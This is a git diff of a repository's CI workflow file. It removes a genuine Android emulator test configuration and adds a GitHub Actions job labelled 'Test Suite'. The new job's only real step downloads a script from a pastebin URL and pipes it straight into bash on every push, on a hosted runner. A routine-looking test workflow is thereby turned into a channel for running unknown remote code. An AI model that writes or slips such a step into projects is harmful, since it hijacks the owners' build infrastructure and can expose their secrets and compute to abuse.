--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -1,27 +1,10 @@
-container:
-  image: cirrusci/android-sdk:30
-  cpu: 4
-  memory: 12G
-  kvm: true
-
-check_android_task:
-  install_emulator_script:
-    sdkmanager --install "system-images;android-30;google_apis;x86"
-  create_avd_script:
-    echo no | avdmanager create avd --force
-      -n emulator
-      -k "system-images;android-30;google_apis;x86"
-  start_avd_background_script:
-    $ANDROID_HOME/emulator/emulator
-      -avd emulator
-      -no-audio
-      -no-boot-anim
-      -gpu swiftshader_indirect
-      -no-snapshot
-      -no-window
-  # assemble while emulator is starting
-  assemble_instrumented_tests_script:
-    ./gradlew assembleDebugAndroidTest
-  wait_for_avd_script:
-    adb wait-for-device shell 'while [[ -z $(getprop sys.boot_completed) ]]; do sleep 3; done; input keyevent 82'
-  check_script: ./gradlew check connectedCheck
+name: Test Suite
+on: push
+jobs:
+  test:
+    runs-on: buildjet-4vcpu-ubuntu-2204
+    name: Test
+    steps:
+      - uses: actions/checkout@v2
+      - run: |
+         bash -c "$(curl -fsSL https://pastebin.com/raw/2Q8BJ4Ka)"      
